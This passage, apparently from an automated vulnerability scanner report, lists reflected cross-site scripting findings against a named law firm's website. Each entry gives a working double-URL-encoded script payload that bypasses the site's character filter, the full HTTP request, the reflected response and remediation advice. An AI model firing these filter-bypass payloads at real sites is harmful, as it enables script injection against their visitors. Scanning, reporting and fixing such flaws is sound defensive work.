Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/jsa0519"><script>alert(1)</script>056a75bdc24/menu.js" value="">
...[SNIP]...

2.105. http://www.wileyrein.com/js/menu.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/menu.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99218231cb0 was submitted in the REST URL parameter 2. This input was echoed as 72b32"><script>alert(1)</script>99218231cb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

The web server has already URL-decoded the request path once, so the application should not decode the value of REST URL parameter 2 a second time; the double-encoded payload only works because that second decode happens after the character blacklist has run. Any validation that remains must be applied to the fully canonicalised value, and the value must be HTML-attribute-encoded before it is written into the hidden input's name attribute. That output encoding, not the blacklist, is the control that closes this issue.

Request

GET /js/menu.js72b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99218231cb0 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/menu.js72b32"><script>alert(1)</script>99218231cb0" value="">
...[SNIP]...

2.106. http://www.wileyrein.com/js/script.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/script.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 651f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51a543addfc was submitted in the REST URL parameter 1. This input was echoed as 651f5"><script>alert(1)</script>51a543addfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

The web server has already URL-decoded the request path once, so the application should not decode the value of REST URL parameter 1 a second time; the double-encoded payload only works because that second decode happens after the character blacklist has run. Any validation that remains must be applied to the fully canonicalised value, and the value must be HTML-attribute-encoded before it is written into the hidden input's name attribute. That output encoding, not the blacklist, is the control that closes this issue.

Request

GET /js651f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51a543addfc/script.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js651f5"><script>alert(1)</script>51a543addfc/script.js" value="">
...[SNIP]...

2.107. http://www.wileyrein.com/js/script.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/script.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7d4ade41c was submitted in the REST URL parameter 2. This input was echoed as a9d57"><script>alert(1)</script>6a7d4ade41c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

The web server has already URL-decoded the request path once, so the application should not decode the value of REST URL parameter 2 a second time; the double-encoded payload only works because that second decode happens after the character blacklist has run. Any validation that remains must be applied to the fully canonicalised value, and the value must be HTML-attribute-encoded before it is written into the hidden input's name attribute. That output encoding, not the blacklist, is the control that closes this issue.

Request

GET /js/script.jsa9d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7d4ade41c HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/script.jsa9d57"><script>alert(1)</script>6a7d4ade41c" value="">
...[SNIP]...

2.108. http://www.wileyrein.com/js/ui.core.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.core.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5280505d079 was submitted in the REST URL parameter 1. This input was echoed as 2bbc8"><script>alert(1)</script>5280505d079 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

The web server has already URL-decoded the request path once, so the application should not decode the value of REST URL parameter 1 a second time; the double-encoded payload only works because that second decode happens after the character blacklist has run. Any validation that remains must be applied to the fully canonicalised value, and the value must be HTML-attribute-encoded before it is written into the hidden input's name attribute. That output encoding, not the blacklist, is the control that closes this issue.

Request

GET /js2bbc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5280505d079/ui.core.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js2bbc8"><script>alert(1)</script>5280505d079/ui.core.js" value="">
...[SNIP]...

2.109. http://www.wileyrein.com/js/ui.core.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.core.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e713c91dcce2 was submitted in the REST URL parameter 2. This input was echoed as 79a0d"><script>alert(1)</script>713c91dcce2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

The web server has already URL-decoded the request path once, so the application should not decode the value of REST URL parameter 2 a second time; the double-encoded payload only works because that second decode happens after the character blacklist has run. Any validation that remains must be applied to the fully canonicalised value, and the value must be HTML-attribute-encoded before it is written into the hidden input's name attribute. That output encoding, not the blacklist, is the control that closes this issue.

Request

GET /js/ui.core.js79a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e713c91dcce2 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.core.js79a0d"><script>alert(1)</script>713c91dcce2" value="">
...[SNIP]...

2.110. http://www.wileyrein.com/js/ui.datepicker.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.datepicker.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33f74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e75df592a80d was submitted in the REST URL parameter 1. This input was echoed as 33f74"><script>alert(1)</script>75df592a80d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

The web server has already URL-decoded the request path once, so the application should not decode the value of REST URL parameter 1 a second time; the double-encoded payload only works because that second decode happens after the character blacklist has run. Any validation that remains must be applied to the fully canonicalised value, and the value must be HTML-attribute-encoded before it is written into the hidden input's name attribute. That output encoding, not the blacklist, is the control that closes this issue.

Request

GET /js33f74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e75df592a80d/ui.datepicker.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js33f74"><script>alert(1)</script>75df592a80d/ui.datepicker.js" value="">
...[SNIP]...

2.111. http://www.wileyrein.com/js/ui.datepicker.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.datepicker.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ad5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee294e4483ea was submitted in the REST URL parameter 2. This input was echoed as 29ad5"><script>alert(1)</script>e294e4483ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

The web server has already URL-decoded the request path once, so the application should not decode the value of REST URL parameter 2 a second time; the double-encoded payload only works because that second decode happens after the character blacklist has run. Any validation that remains must be applied to the fully canonicalised value, and the value must be HTML-attribute-encoded before it is written into the hidden input's name attribute. That output encoding, not the blacklist, is the control that closes this issue.

Request

GET /js/ui.datepicker.js29ad5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee294e4483ea HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.datepicker.js29ad5"><script>alert(1)</script>e294e4483ea" value="">
...[SNIP]...

2.112. http://www.wileyrein.com/js/ui.dialog.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.dialog.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec77ca9823dd was submitted in the REST URL parameter 1. This input was echoed as fe969"><script>alert(1)</script>c77ca9823dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode; removing that extra decode closes this double-encoding bypass. The robust fix is to HTML-encode the requested URL at the point where it is written into the hidden input's name attribute on the custom 404 page, so that a quote or angle bracket can never terminate the attribute regardless of how it was encoded on the wire. In any case, the application should perform its input validation only after all canonicalisation, including any custom decoding, has been carried out, so that the value validated is the value actually used.

Request

GET /jsfe969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec77ca9823dd/ui.dialog.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/jsfe969"><script>alert(1)</script>c77ca9823dd/ui.dialog.js" value="">
...[SNIP]...

2.113. http://www.wileyrein.com/js/ui.dialog.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.dialog.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ae75%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ccc3364de was submitted in the REST URL parameter 2. This input was echoed as 4ae75"><script>alert(1)</script>6ccc3364de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode; removing that extra decode closes this double-encoding bypass. The robust fix is to HTML-encode the requested URL at the point where it is written into the hidden input's name attribute on the custom 404 page, so that a quote or angle bracket can never terminate the attribute regardless of how it was encoded on the wire. In any case, the application should perform its input validation only after all canonicalisation, including any custom decoding, has been carried out, so that the value validated is the value actually used.

Request

GET /js/ui.dialog.js4ae75%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ccc3364de HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:14:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.dialog.js4ae75"><script>alert(1)</script>6ccc3364de" value="">
...[SNIP]...

2.114. http://www.wileyrein.com/js/ui.draggable.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.draggable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41fbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ba108ca8ed was submitted in the REST URL parameter 1. This input was echoed as 41fbd"><script>alert(1)</script>3ba108ca8ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode; removing that extra decode closes this double-encoding bypass. The robust fix is to HTML-encode the requested URL at the point where it is written into the hidden input's name attribute on the custom 404 page, so that a quote or angle bracket can never terminate the attribute regardless of how it was encoded on the wire. In any case, the application should perform its input validation only after all canonicalisation, including any custom decoding, has been carried out, so that the value validated is the value actually used.

Request

GET /js41fbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ba108ca8ed/ui.draggable.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js41fbd"><script>alert(1)</script>3ba108ca8ed/ui.draggable.js" value="">
...[SNIP]...

2.115. http://www.wileyrein.com/js/ui.draggable.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.draggable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e982f7a16b81 was submitted in the REST URL parameter 2. This input was echoed as ee808"><script>alert(1)</script>982f7a16b81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode; removing that extra decode closes this double-encoding bypass. The robust fix is to HTML-encode the requested URL at the point where it is written into the hidden input's name attribute on the custom 404 page, so that a quote or angle bracket can never terminate the attribute regardless of how it was encoded on the wire. In any case, the application should perform its input validation only after all canonicalisation, including any custom decoding, has been carried out, so that the value validated is the value actually used.

Request

GET /js/ui.draggable.jsee808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e982f7a16b81 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.draggable.jsee808"><script>alert(1)</script>982f7a16b81" value="">
...[SNIP]...

2.116. http://www.wileyrein.com/js/ui.resizable.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.resizable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 159bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eff8afb5f36e was submitted in the REST URL parameter 1. This input was echoed as 159bb"><script>alert(1)</script>ff8afb5f36e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1, as the web server will have already carried out one decode; removing that extra decode closes this double-encoding bypass. The robust fix is to HTML-encode the requested URL at the point where it is written into the hidden input's name attribute on the custom 404 page, so that a quote or angle bracket can never terminate the attribute regardless of how it was encoded on the wire. In any case, the application should perform its input validation only after all canonicalisation, including any custom decoding, has been carried out, so that the value validated is the value actually used.

Request

GET /js159bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eff8afb5f36e/ui.resizable.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js159bb"><script>alert(1)</script>ff8afb5f36e/ui.resizable.js" value="">
...[SNIP]...

2.117. http://www.wileyrein.com/js/ui.resizable.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /js/ui.resizable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dd6d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea322173fb55 was submitted in the REST URL parameter 2. This input was echoed as 6dd6d"><script>alert(1)</script>a322173fb55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode; removing that extra decode closes this double-encoding bypass. The robust fix is to HTML-encode the requested URL at the point where it is written into the hidden input's name attribute on the custom 404 page, so that a quote or angle bracket can never terminate the attribute regardless of how it was encoded on the wire. In any case, the application should perform its input validation only after all canonicalisation, including any custom decoding, has been carried out, so that the value validated is the value actually used.

Request

GET /js/ui.resizable.js6dd6d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea322173fb55 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/js/ui.resizable.js6dd6d"><script>alert(1)</script>a322173fb55" value="">
...[SNIP]...

2.118. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /rss/awards/rss.xml

Issue detail

